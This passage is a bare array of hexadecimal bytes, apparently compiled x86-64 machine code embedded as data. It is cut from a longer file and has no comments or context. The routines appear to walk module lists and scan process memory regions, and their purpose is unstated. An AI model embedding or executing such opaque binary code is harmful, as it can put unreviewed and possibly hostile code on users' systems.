0x15, 0x3F, 0x5B, 0x00, 0x00, 0x8B, 0xC7, 0xEB, 0x02, 0x33, 0xC0, 0x48,
0x8B, 0x5C, 0x24, 0x50, 0x48, 0x8B, 0x74, 0x24, 0x58, 0x48, 0x83, 0xC4,
0x30, 0x41, 0x5F, 0x41, 0x5E, 0x5F, 0xC3, 0xCC, 0x48, 0x8B, 0xC4, 0x48,
0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x20, 0x44, 0x89, 0x40, 0x18, 0x48,
0x89, 0x50, 0x10, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
0x48, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00, 0x45, 0x8B, 0xE0, 0x48, 0x8B,
0xFA, 0x48, 0x8B, 0xD9, 0x45, 0x33, 0xF6, 0x45, 0x8B, 0xFE, 0x48, 0x85,
0xC9, 0x75, 0x07, 0x33, 0xC0, 0xE9, 0x62, 0x02, 0x00, 0x00, 0xFF, 0x15,
0x10, 0x59, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x40, 0x0F, 0x95, 0xC6, 0x48,
0x8D, 0x54, 0x24, 0x48, 0x48, 0x8B, 0xCB, 0xE8, 0xE6, 0x4C, 0x00, 0x00,
0x90, 0x48, 0x8B, 0xCB, 0x40, 0x84, 0xF6, 0x0F, 0x84, 0x26, 0x01, 0x00,
0x00, 0xFF, 0x15, 0xE9, 0x58, 0x00, 0x00, 0x4C, 0x8B, 0xE0, 0x48, 0x85,
0xC0, 0x0F, 0x84, 0x12, 0x02, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x85, 0xC0,
0x0F, 0x84, 0x07, 0x02, 0x00, 0x00, 0x44, 0x8B, 0x68, 0x0C, 0x41, 0x8B,
0x44, 0x24, 0x0C, 0x48, 0x83, 0xC0, 0x0C, 0x4C, 0x3B, 0xE8, 0x0F, 0x84,
0xF1, 0x01, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x28, 0x48, 0x8D, 0x4C, 0x24,
0x38, 0xE8, 0xB2, 0x05, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x30, 0x48, 0x8D,
0x4C, 0x24, 0x28, 0xE8, 0xA4, 0x05, 0x00, 0x00, 0x44, 0x3B, 0xBC, 0x24,
0xC0, 0x00, 0x00, 0x00, 0x0F, 0x83, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B,
0xC7, 0x48, 0x69, 0xF0, 0xA0, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x1C, 0x3E,
0x33, 0xD2, 0x41, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4B, 0x0C,
0xE8, 0x4B, 0x50, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02, 0x00,
0x00, 0x48, 0x8D, 0x8E, 0x0C, 0x01, 0x00, 0x00, 0x48, 0x03, 0xCF, 0xE8,
0x34, 0x50, 0x00, 0x00, 0x41, 0x8B, 0x45, 0x18, 0x48, 0x8B, 0x8C, 0x24,
0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x04, 0x0E, 0x41, 0x8B, 0x45, 0x20,
0x89, 0x44, 0x0E, 0x08, 0x0F, 0xB7, 0x44, 0x24, 0x28, 0xB9, 0x7F, 0x00,
0x00, 0x00, 0x44, 0x8B, 0xC1, 0x66, 0x3B, 0x4C, 0x24, 0x28, 0x44, 0x0F,
0x43, 0xC0, 0x48, 0x8B, 0x54, 0x24, 0x30, 0x48, 0x8D, 0x4B, 0x0C, 0xE8,
0xB8, 0x4C, 0x00, 0x00, 0x0F, 0xB7, 0x44, 0x24, 0x38, 0xBB, 0x03, 0x01,
0x00, 0x00, 0x44, 0x8B, 0xC3, 0x66, 0x3B, 0x5C, 0x24, 0x38, 0x44, 0x0F,
0x43, 0xC0, 0x48, 0x8B, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8F, 0x0C, 0x01,
0x00, 0x00, 0x48, 0x03, 0xCE, 0xE8, 0x8E, 0x4C, 0x00, 0x00, 0x41, 0x8B,
0x45, 0x44, 0x48, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89,
0x84, 0x3E, 0x18, 0x03, 0x00, 0x00, 0x41, 0xFF, 0xC6, 0x44, 0x89, 0x74,
0x24, 0x20, 0x41, 0xFF, 0xC7, 0x44, 0x89, 0x7C, 0x24, 0x24, 0x45, 0x8B,
0x6D, 0x00, 0xE9, 0xFB, 0xFE, 0xFF, 0xFF, 0xFF, 0x15, 0xCB, 0x57, 0x00,
0x00, 0x48, 0x8B, 0xF0, 0x48, 0x85, 0xC0, 0x0F, 0x84, 0xEC, 0x00, 0x00,
0x00, 0x48, 0x8B, 0x58, 0x18, 0x48, 0x85, 0xDB, 0x0F, 0x84, 0xDF, 0x00,
0x00, 0x00, 0x48, 0x8B, 0x5B, 0x10, 0x41, 0xBD, 0x03, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x46, 0x18, 0x48, 0x83, 0xC0, 0x10, 0x48, 0x3B, 0xD8, 0x0F,
0x84, 0xC4, 0x00, 0x00, 0x00, 0x45, 0x3B, 0xFC, 0x0F, 0x83, 0xA3, 0x00,
0x00, 0x00, 0x41, 0x8B, 0xC7, 0x4C, 0x69, 0xE0, 0xA0, 0x03, 0x00, 0x00,
0x48, 0x8D, 0x4F, 0x0C, 0x49, 0x03, 0xCC, 0x33, 0xD2, 0x41, 0xB8, 0x00,
0x01, 0x00, 0x00, 0xE8, 0x40, 0x4F, 0x00, 0x00, 0x48, 0x8D, 0x8F, 0x0C,
0x01, 0x00, 0x00, 0x49, 0x03, 0xCC, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02,
0x00, 0x00, 0xE8, 0x29, 0x4F, 0x00, 0x00, 0x48, 0x8B, 0x43, 0x30, 0x49,
0x89, 0x04, 0x3C, 0x8B, 0x43, 0x40, 0x41, 0x89, 0x44, 0x3C, 0x08, 0x0F,
0xB7, 0x4B, 0x58, 0xB8, 0x7F, 0x00, 0x00, 0x00, 0x66, 0x3B, 0xC1, 0x72,
0x03, 0x0F, 0xB7, 0xC1, 0x4C, 0x8B, 0xC0, 0x48, 0x8B, 0x53, 0x60, 0x48,
0x8D, 0x4F, 0x0C, 0x49, 0x03, 0xCC, 0xE8, 0xB5, 0x4B, 0x00, 0x00, 0x0F,
0xB7, 0x43, 0x48, 0x66, 0x44, 0x3B, 0xE8, 0x44, 0x0F, 0xB7, 0xC0, 0x73,
0x03, 0x4D, 0x8B, 0xC5, 0x48, 0x8B, 0x53, 0x50, 0x48, 0x8D, 0x8F, 0x0C,
0x01, 0x00, 0x00, 0x49, 0x03, 0xCC, 0xE8, 0x91, 0x4B, 0x00, 0x00, 0x8B,
0x83, 0x80, 0x00, 0x00, 0x00, 0x49, 0x89, 0x84, 0x3C, 0x18, 0x03, 0x00,
0x00, 0x44, 0x8B, 0xA4, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x41, 0xFF, 0xC6,
0x44, 0x89, 0x74, 0x24, 0x20, 0x41, 0xFF, 0xC7, 0x44, 0x89, 0x7C, 0x24,
0x24, 0x48, 0x8B, 0x1B, 0xE9, 0x2B, 0xFF, 0xFF, 0xFF, 0xEB, 0x08, 0x45,
0x33, 0xF6, 0x44, 0x89, 0x74, 0x24, 0x20, 0x48, 0x8D, 0x4C, 0x24, 0x48,
0xE8, 0xA7, 0x4A, 0x00, 0x00, 0x41, 0x8B, 0xC6, 0x4C, 0x8D, 0x9C, 0x24,
0x80, 0x00, 0x00, 0x00, 0x49, 0x8B, 0x5B, 0x30, 0x49, 0x8B, 0x73, 0x48,
0x49, 0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F,
0xC3, 0xCC, 0xCC, 0xCC, 0x44, 0x89, 0x44, 0x24, 0x18, 0x48, 0x89, 0x54,
0x24, 0x10, 0x53, 0x56, 0x57, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41,
0x57, 0x48, 0x81, 0xEC, 0x80, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xF2, 0x48,
0x8B, 0xD9, 0x45, 0x33, 0xF6, 0x45, 0x8B, 0xFE, 0x48, 0x85, 0xC9, 0x75,
0x07, 0x33, 0xC0, 0xE9, 0x70, 0x02, 0x00, 0x00, 0xFF, 0x15, 0x5A, 0x56,
0x00, 0x00, 0x48, 0x85, 0xC0, 0x40, 0x0F, 0x95, 0xC7, 0x48, 0x8D, 0x54,
0x24, 0x48, 0x48, 0x8B, 0xCB, 0xE8, 0x30, 0x4A, 0x00, 0x00, 0x90, 0x48,
0x8B, 0xCB, 0x40, 0x84, 0xFF, 0x0F, 0x84, 0x17, 0x01, 0x00, 0x00, 0xFF,
0x15, 0x33, 0x56, 0x00, 0x00, 0x4C, 0x8B, 0xE0, 0x48, 0x85, 0xC0, 0x0F,
0x84, 0x20, 0x02, 0x00, 0x00, 0x8B, 0x40, 0x0C, 0x85, 0xC0, 0x0F, 0x84,
0x15, 0x02, 0x00, 0x00, 0x44, 0x8B, 0x68, 0x0C, 0x41, 0x8B, 0x44, 0x24,
0x0C, 0x48, 0x83, 0xC0, 0x0C, 0x4C, 0x3B, 0xE8, 0x0F, 0x84, 0xFF, 0x01,
0x00, 0x00, 0x41, 0x8B, 0x55, 0x28, 0x48, 0x8D, 0x4C, 0x24, 0x38, 0xE8,
0xFC, 0x02, 0x00, 0x00, 0x41, 0x8B, 0x55, 0x30, 0x48, 0x8D, 0x4C, 0x24,
0x28, 0xE8, 0xEE, 0x02, 0x00, 0x00, 0x44, 0x3B, 0xBC, 0x24, 0xD0, 0x00,
0x00, 0x00, 0x0F, 0x83, 0xA1, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xC7, 0x48,
0x69, 0xD8, 0x18, 0x03, 0x00, 0x00, 0x48, 0x8D, 0x3C, 0x33, 0x33, 0xD2,
0x41, 0xB8, 0x00, 0x01, 0x00, 0x00, 0x48, 0x8D, 0x4F, 0x0C, 0xE8, 0x95,
0x4D, 0x00, 0x00, 0x48, 0x03, 0xF3, 0x33, 0xD2, 0x41, 0xB8, 0x08, 0x02,
0x00, 0x00, 0x48, 0x8D, 0x8E, 0x0C, 0x01, 0x00, 0x00, 0xE8, 0x7E, 0x4D,
0x00, 0x00, 0x41, 0x8B, 0x45, 0x18, 0x48, 0x8B, 0x8C, 0x24, 0xC8, 0x00,
0x00, 0x00, 0x48, 0x89, 0x04, 0x0B, 0x41, 0x8B, 0x45, 0x20, 0x89, 0x44,
0x0B, 0x08, 0x0F, 0xB7, 0x44, 0x24, 0x28, 0xB9, 0x7F, 0x00, 0x00, 0x00,
0x44, 0x8B, 0xC1, 0x66, 0x3B, 0x4C, 0x24, 0x28, 0x44, 0x0F, 0x43, 0xC0,
0x48, 0x8B, 0x54, 0x24, 0x30, 0x48, 0x8D, 0x4F, 0x0C, 0xE8, 0x02, 0x4A,
0x00, 0x00, 0x0F, 0xB7, 0x44, 0x24, 0x38, 0xBB, 0x03, 0x01, 0x00, 0x00,
0x44, 0x8B, 0xC3, 0x66, 0x3B, 0x5C, 0x24, 0x38, 0x44, 0x0F, 0x43, 0xC0,
0x48, 0x8B, 0x54, 0x24, 0x40, 0x48, 0x8D, 0x8E, 0x0C, 0x01, 0x00, 0x00,
0xE8, 0xDB, 0x49, 0x00, 0x00, 0x48, 0x8B, 0xB4, 0x24, 0xC8, 0x00, 0x00,
0x00, 0x41, 0xFF, 0xC6, 0x44, 0x89, 0x74, 0x24, 0x20, 0x41, 0xFF, 0xC7,
0x44, 0x89, 0x7C, 0x24, 0x24, 0x45, 0x8B, 0x6D, 0x00, 0xE9, 0x0A, 0xFF,
0xFF, 0xFF, 0xFF, 0x15, 0x24, 0x55, 0x00, 0x00, 0x48, 0x8B, 0xF0, 0x48,
0x85, 0xC0, 0x0F, 0x84, 0x09, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x78, 0x18,
0x48, 0x85, 0xFF, 0x0F, 0x84, 0xFC, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x7F,
0x10, 0x41, 0xBD, 0x7F, 0x00, 0x00, 0x00, 0x41, 0xBC, 0x03, 0x01, 0x00,
0x00, 0x48, 0x8B, 0x46, 0x18, 0x48, 0x83, 0xC0, 0x10, 0x48, 0x3B, 0xF8,
0x0F, 0x84, 0xDB, 0x00, 0x00, 0x00, 0x44, 0x3B, 0xBC, 0x24, 0xD0, 0x00,
0x00, 0x00, 0x0F, 0x83, 0xB5, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xC7, 0x48,
0x69, 0xD8, 0x18, 0x03, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0xC8, 0x00,
0x00, 0x00, 0x48, 0x83, 0xC0, 0x0C, 0x48, 0x03, 0xC3, 0x48, 0x89, 0x84,
0x24, 0xC0, 0x00, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0x00, 0x01, 0x00,
0x00, 0x48, 0x8B, 0xC8, 0xE8, 0x7B, 0x4C, 0x00, 0x00, 0x48, 0x8B, 0x84,
0x24, 0xC8, 0x00, 0x00, 0x00, 0x48, 0x05, 0x0C, 0x01, 0x00, 0x00, 0x48,
0x03, 0xC3, 0x48, 0x89, 0x84, 0x24, 0xD8, 0x00, 0x00, 0x00, 0x33, 0xD2,
0x41, 0xB8, 0x08, 0x02, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0xE8, 0x52, 0x4C,
0x00, 0x00, 0x48, 0x8B, 0x47, 0x30, 0x48, 0x8B, 0x8C, 0x24, 0xC8, 0x00,
0x00, 0x00, 0x48, 0x89, 0x04, 0x0B, 0x8B, 0x47, 0x40, 0x89, 0x44, 0x0B,
0x08, 0x0F, 0xB7, 0x47, 0x58, 0x66, 0x44, 0x3B, 0xE8, 0x44, 0x0F, 0xB7,
0xC0, 0x73, 0x03, 0x4D, 0x8B, 0xC5, 0x48, 0x8B, 0x57, 0x60, 0x48, 0x8B,
0x8C, 0x24, 0xC0, 0x00, 0x00, 0x00, 0xE8, 0xD9, 0x48, 0x00, 0x00, 0x0F,
0xB7, 0x47, 0x48, 0x66, 0x44, 0x3B, 0xE0, 0x44, 0x0F, 0xB7, 0xC0, 0x73,
0x03, 0x4D, 0x8B, 0xC4, 0x48, 0x8B, 0x57, 0x50, 0x48, 0x8B, 0x8C, 0x24,
0xD8, 0x00, 0x00, 0x00, 0xE8, 0xB7, 0x48, 0x00, 0x00, 0x41, 0xFF, 0xC6,
0x44, 0x89, 0x74, 0x24, 0x20, 0x41, 0xFF, 0xC7, 0x44, 0x89, 0x7C, 0x24,
0x24, 0x48, 0x8B, 0x3F, 0xE9, 0x14, 0xFF, 0xFF, 0xFF, 0xEB, 0x08, 0x45,
0x33, 0xF6, 0x44, 0x89, 0x74, 0x24, 0x20, 0x48, 0x8D, 0x4C, 0x24, 0x48,
0xE8, 0xE3, 0x47, 0x00, 0x00, 0x41, 0x8B, 0xC6, 0x48, 0x81, 0xC4, 0x80,
0x00, 0x00, 0x00, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5F,
0x5E, 0x5B, 0xC3, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
0x24, 0x10, 0x48, 0x89, 0x7C, 0x24, 0x18, 0x41, 0x56, 0x48, 0x83, 0xEC,
0x50, 0x4C, 0x8B, 0xF2, 0x48, 0x8B, 0xD9, 0x40, 0xB6, 0x01, 0x48, 0x85,
0xC9, 0x75, 0x07, 0x32, 0xC0, 0xE9, 0xA0, 0x00, 0x00, 0x00, 0xFF, 0x15,
0xAC, 0x53, 0x00, 0x00, 0x48, 0x85, 0xC0, 0x40, 0x0F, 0x95, 0xC7, 0x48,
0x8D, 0x54, 0x24, 0x20, 0x48, 0x8B, 0xCB, 0xE8, 0x82, 0x47, 0x00, 0x00,
0x90, 0x48, 0x8B, 0xCB, 0x40, 0x84, 0xFF, 0x74, 0x33, 0xFF, 0x15, 0x89,
0x53, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0, 0x74, 0x5D, 0x8B,
0x40, 0x0C, 0x85, 0xC0, 0x74, 0x56, 0x8B, 0x58, 0x0C, 0x8B, 0x4F, 0x0C,
0x48, 0x83, 0xC1, 0x0C, 0x48, 0x3B, 0xD9, 0x74, 0x47, 0x48, 0x8B, 0xD3,
0x49, 0x8B, 0xCE, 0xE8, 0x64, 0xF7, 0xFF, 0xFF, 0x8B, 0x1B, 0xEB, 0xE5,
0xFF, 0x15, 0x5E, 0x53, 0x00, 0x00, 0x48, 0x8B, 0xF8, 0x48, 0x85, 0xC0,
0x74, 0x2A, 0x48, 0x8B, 0x58, 0x18, 0x48, 0x85, 0xDB, 0x74, 0x21, 0x48,
0x8B, 0x5B, 0x10, 0x48, 0x8B, 0x4F, 0x18, 0x48, 0x83, 0xC1, 0x10, 0x48,
0x3B, 0xD9, 0x74, 0x10, 0x48, 0x8B, 0xD3, 0x49, 0x8B, 0xCE, 0xE8, 0x0D,
0xF8, 0xFF, 0xFF, 0x48, 0x8B, 0x1B, 0xEB, 0xE3, 0xEB, 0x03, 0x40, 0x32,
0xF6, 0x48, 0x8D, 0x4C, 0x24, 0x20, 0xE8, 0x05, 0x47, 0x00, 0x00, 0x40,
0x8A, 0xC6, 0x48, 0x8B, 0x5C, 0x24, 0x60, 0x48, 0x8B, 0x74, 0x24, 0x68,
0x48, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0x83, 0xC4, 0x50, 0x41, 0x5E, 0xC3,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x45, 0x33, 0xC0, 0x45, 0x33, 0xD2, 0x4C,
0x89, 0x01, 0x41, 0x8B, 0xC2, 0x4C, 0x89, 0x41, 0x08, 0x48, 0x85, 0xD2,
0x74, 0x63, 0x41, 0xB8, 0xFF, 0x7F, 0x00, 0x00, 0x41, 0x8D, 0x5A, 0x02,
0x45, 0x8B, 0xC8, 0x48, 0x8B, 0xC2, 0x66, 0x44, 0x39, 0x10, 0x74, 0x09,
0x48, 0x03, 0xC3, 0x49, 0x83, 0xE9, 0x01, 0x75, 0xF1, 0x49, 0x8B, 0xC1,
0x41, 0xBB, 0x0D, 0x00, 0x00, 0xC0, 0x48, 0xF7, 0xD8, 0x1B, 0xC0, 0xF7,
0xD0, 0x41, 0x23, 0xC3, 0x4D, 0x85, 0xC9, 0x74, 0x05, 0x4D, 0x2B, 0xC1,
0xEB, 0x03, 0x4D, 0x8B, 0xC2, 0x4D, 0x85, 0xC9, 0x74, 0x1F, 0x48, 0x85,
0xC9, 0x74, 0x17, 0x66, 0x45, 0x03, 0xC0, 0x48, 0x89, 0x51, 0x08, 0x66,
0x44, 0x89, 0x01, 0x66, 0x44, 0x03, 0xC3, 0x66, 0x44, 0x89, 0x41, 0x02,
0xEB, 0x03, 0x41, 0x8B, 0xC3, 0x48, 0x8B, 0x5C, 0x24, 0x08, 0xC3, 0xCC,
0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x48, 0x89,
0x7C, 0x24, 0x18, 0x4C, 0x8B, 0xD1, 0x48, 0x85, 0xC9, 0x0F, 0x84, 0x3C,
0x01, 0x00, 0x00, 0x83, 0x79, 0x0C, 0x00, 0x0F, 0x84, 0x32, 0x01, 0x00,
0x00, 0x44, 0x8B, 0x41, 0x08, 0x41, 0x81, 0xF8, 0x38, 0x01, 0x00, 0x00,
0x0F, 0x8C, 0xC5, 0x00, 0x00, 0x00, 0x33, 0xDB, 0x48, 0x8D, 0x35, 0x11,
0x71, 0x00, 0x00, 0xBF, 0xFF, 0xFF, 0xFF, 0x7F, 0x41, 0xBB, 0xE0, 0x04,
0x00, 0x00, 0x4D, 0x8B, 0x0A, 0x46, 0x8B, 0x44, 0x0B, 0x08, 0x46, 0x33,
0x04, 0x0B, 0x4C, 0x23, 0xC7, 0x4E, 0x33, 0x04, 0x0B, 0x49, 0x8B, 0xC8,
0x49, 0xD1, 0xE8, 0x83, 0xE1, 0x01, 0x48, 0x8B, 0x14, 0xCE, 0x4A, 0x33,
0x94, 0x0B, 0xE0, 0x04, 0x00, 0x00, 0x49, 0x33, 0xD0, 0x4A, 0x89, 0x14,
0x0B, 0x48, 0x83, 0xC3, 0x08, 0x49, 0x3B, 0xDB, 0x7C, 0xC8, 0x4D, 0x8B,
0x0A, 0x47, 0x8B, 0x44, 0x0B, 0x08, 0x47, 0x33, 0x04, 0x0B, 0x4C, 0x23,
0xC7, 0x4F, 0x33, 0x04, 0x0B, 0x49, 0x8B, 0xC8, 0x49, 0xD1, 0xE8, 0x83,
0xE1, 0x01, 0x48, 0x8B, 0x14, 0xCE, 0x4B, 0x33, 0x94, 0x0B, 0x20, 0xFB,
0xFF, 0xFF, 0x49, 0x33, 0xD0, 0x4B, 0x89, 0x14, 0x0B, 0x49, 0x83, 0xC3,
0x08, 0x49, 0x81, 0xFB, 0xB8, 0x09, 0x00, 0x00, 0x7C, 0xC4, 0x4D, 0x8B,
0x0A, 0x45, 0x8B, 0x81, 0xB8, 0x09, 0x00, 0x00, 0x45, 0x33, 0x01, 0x4C,
0x23, 0xC7, 0x4D, 0x33, 0x81, 0xB8, 0x09, 0x00, 0x00, 0x49, 0x8B, 0xC8,
0x49, 0xD1, 0xE8, 0x83, 0xE1, 0x01, 0x48, 0x8B, 0x14, 0xCE, 0x49, 0x33,
0x91, 0xD8, 0x04, 0x00, 0x00, 0x49, 0x33, 0xD0, 0x49, 0x89, 0x91, 0xB8,
0x09, 0x00, 0x00, 0x41, 0x83, 0x62, 0x08, 0x00, 0x45, 0x33, 0xC0, 0x49,
0x8B, 0x02, 0x49, 0x63, 0xC8, 0x48, 0x8B, 0x14, 0xC8, 0x41, 0x8D, 0x40,
0x01, 0x41, 0x89, 0x42, 0x08, 0x48, 0xB9, 0x55, 0x55, 0x55, 0x55, 0x05,
0x00, 0x00, 0x00, 0x48, 0x8B, 0xC2, 0x48, 0xC1, 0xE8, 0x1D, 0x48, 0x23,
0xC1, 0x48, 0xB9, 0xD3, 0xF6, 0xFF, 0x3F, 0xEB, 0x38, 0x00, 0x00, 0x48,
0x33, 0xD0, 0x48, 0x8B, 0xC2, 0x48, 0x23, 0xC1, 0x48, 0xC1, 0xE0, 0x11,
0x48, 0x33, 0xD0, 0x48, 0x8B, 0xC2, 0x48, 0x25, 0x77, 0xBF, 0xFF, 0xFF,
0x48, 0xC1, 0xE0, 0x25, 0x48, 0x33, 0xD0, 0x48, 0x8B, 0xC2, 0x48, 0xC1,
0xE8, 0x2B, 0x48, 0x33, 0xC2, 0xEB, 0x02, 0x33, 0xC0, 0x48, 0x8B, 0x5C,
0x24, 0x08, 0x48, 0x8B, 0x74, 0x24, 0x10, 0x48, 0x8B, 0x7C, 0x24, 0x18,
0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x85, 0xC9, 0x0F, 0x84, 0x8F, 0x00, 0x00,
0x00, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x33,
0xC0, 0x48, 0x8B, 0xFA, 0x48, 0x89, 0x01, 0x48, 0x8B, 0xD9, 0x48, 0x89,
0x41, 0x08, 0xBA, 0xC0, 0x09, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x15, 0x15,
0x50, 0x00, 0x00, 0x33, 0xD2, 0x41, 0xB8, 0xC0, 0x09, 0x00, 0x00, 0x48,
0x8B, 0xC8, 0x48, 0x89, 0x03, 0xE8, 0xA2, 0x48, 0x00, 0x00, 0x48, 0x8B,
0x03, 0x41, 0xB9, 0x01, 0x00, 0x00, 0x00, 0x44, 0x89, 0x4B, 0x0C, 0x48,
0x89, 0x38, 0x44, 0x89, 0x4B, 0x08, 0x4C, 0x63, 0x43, 0x08, 0x48, 0x8B,
0x13, 0x4A, 0x8B, 0x44, 0xC2, 0xF8, 0x48, 0x8B, 0xC8, 0x48, 0xC1, 0xE9,
0x3E, 0x48, 0x33, 0xC8, 0x48, 0xB8, 0x2D, 0x7F, 0x95, 0x4C, 0x2D, 0xF4,
0x51, 0x58, 0x48, 0x0F, 0xAF, 0xC8, 0x49, 0x03, 0xC8, 0x4A, 0x89, 0x0C,
0xC2, 0x44, 0x01, 0x4B, 0x08, 0x81, 0x7B, 0x08, 0x38, 0x01, 0x00, 0x00,
0x7C, 0xC8, 0x48, 0x8B, 0x5C, 0x24, 0x30, 0x48, 0x83, 0xC4, 0x20, 0x5F,
0xC3, 0xCC, 0xCC, 0xCC, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74,
0x24, 0x18, 0x55, 0x57, 0x41, 0x54, 0x41, 0x56, 0x41, 0x57, 0x48, 0x8B,
0xEC, 0x48, 0x83, 0xEC, 0x60, 0x45, 0x33, 0xE4, 0x4D, 0x8B, 0xF0, 0x48,
0x8B, 0xF2, 0x48, 0x8B, 0xF9, 0x33, 0xD2, 0x48, 0x8D, 0x4D, 0xD0, 0x45,
0x8A, 0xF9, 0x41, 0x8B, 0xDC, 0x45, 0x8D, 0x44, 0x24, 0x30, 0xE8, 0x0D,
0x48, 0x00, 0x00, 0x4C, 0x89, 0x65, 0x38, 0x49, 0x3B, 0xF6, 0x0F, 0x83,
0xED, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x45, 0x38, 0x45, 0x33, 0xC0, 0x48,
0x89, 0x44, 0x24, 0x28, 0x4C, 0x8D, 0x4D, 0xD0, 0x48, 0x8B, 0xD6, 0x48,
0xC7, 0x44, 0x24, 0x20, 0x30, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC9, 0xFF,
0xFF, 0x15, 0x5A, 0x50, 0x00, 0x00, 0x8B, 0xD8, 0x85, 0xC0, 0x0F, 0x88,
0xB3, 0x00, 0x00, 0x00, 0x81, 0x7D, 0xF0, 0x00, 0x10, 0x00, 0x00, 0x0F,
0x85, 0x81, 0x00, 0x00, 0x00, 0x83, 0x7D, 0xF4, 0x01, 0x74, 0x7B, 0xF7,
0x45, 0xF4, 0x00, 0x01, 0x00, 0x00, 0x75, 0x72, 0x81, 0x7D, 0xF8, 0x00,
0x00, 0x02, 0x00, 0x74, 0x05, 0x45, 0x84, 0xFF, 0x74, 0x64, 0xBA, 0x58,
0x00, 0x00, 0x00, 0x41, 0xB8, 0x4D, 0x54, 0x46, 0x47, 0x8D, 0x4A, 0xA9,
0xFF, 0x15, 0xFA, 0x4E, 0x00, 0x00, 0x48, 0x8B, 0xC8, 0x48, 0x85, 0xC0,
0x74, 0x5C, 0x0F, 0x10, 0x45, 0xD0, 0x0F, 0x11, 0x40, 0x10, 0x0F, 0x10,
0x4D, 0xE0, 0x0F, 0x11, 0x48, 0x20, 0x0F, 0x10, 0x45, 0xF0, 0x4C, 0x89,
0x60, 0x40, 0x4C, 0x89, 0x60, 0x48, 0x0F, 0x11, 0x40, 0x30, 0x44, 0x88,
0x60, 0x50, 0x81, 0x7D, 0xF8, 0x00, 0x00, 0x02, 0x00, 0x0F, 0x95, 0xC0,
0x88, 0x41, 0x51, 0x48, 0x8B, 0x47, 0x08, 0x48, 0x39, 0x38, 0x75, 0x1B,
0x48, 0x89, 0x39, 0x48, 0x89, 0x41, 0x08, 0x48, 0x89, 0x08, 0x48, 0x89,
0x4F, 0x08, 0x48, 0x8B, 0x75, 0xE8, 0x48, 0x03, 0x75, 0xD0, 0xE9, 0x2C,
0xFF, 0xFF, 0xFF, 0xB9, 0x03, 0x00, 0x00, 0x00, 0xCD, 0x29, 0x48, 0x8B,
0xD7, 0x33, 0xC9, 0xE8, 0x2C, 0x00, 0x00, 0x00, 0xB8, 0x17, 0x00, 0x00,
0xC0, 0xEB, 0x0C, 0x81, 0xFB, 0x0D, 0x00, 0x00, 0xC0, 0x41, 0x0F, 0x44,
0xDC, 0x8B, 0xC3, 0x4C, 0x8D, 0x5C, 0x24, 0x60, 0x49, 0x8B, 0x5B, 0x30,
0x49, 0x8B, 0x73, 0x40, 0x49, 0x8B, 0xE3, 0x41, 0x5F, 0x41, 0x5E, 0x41,
0x5C, 0x5F, 0x5D, 0xC3, 0x48, 0x85, 0xD2, 0x0F, 0x84, 0x95, 0x00, 0x00,
0x00, 0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x74, 0x24, 0x10, 0x57,
0x48, 0x83, 0xEC, 0x20, 0x48, 0x8B, 0x3A, 0x48, 0x8B, 0xDA, 0x40, 0x8A,
0xF1, 0xEB, 0x67, 0x48, 0x8B, 0x57, 0x48, 0x48, 0x85, 0xD2, 0x74, 0x34,
0x48, 0x8B, 0xCA, 0x40, 0x84, 0xF6, 0x74, 0x16, 0x48, 0x8B, 0x47, 0x40,
0x48, 0x85, 0xC0, 0x74, 0x0D, 0x48, 0x8B, 0xC8, 0xFF, 0x15, 0xFA, 0x4E,
0x00, 0x00, 0x48, 0x8B, 0x4F, 0x48, 0x80, 0x7F, 0x50, 0x00, 0x74, 0x0A,
0xFF, 0x15, 0xDA, 0x4E, 0x00, 0x00, 0x48, 0x8B, 0x4F, 0x48, 0xFF, 0x15,
0xE8, 0x4E, 0x00, 0x00, 0x48, 0x8B, 0x03, 0x48, 0x39, 0x58, 0x08, 0x75,
0x36, 0x48, 0x8B, 0x08, 0x48, 0x39, 0x41, 0x08, 0x75, 0x2D, 0x48, 0x89,
0x0B, 0xBA, 0x4D, 0x54, 0x46, 0x47, 0x48, 0x89, 0x59, 0x08, 0x48, 0x8B,
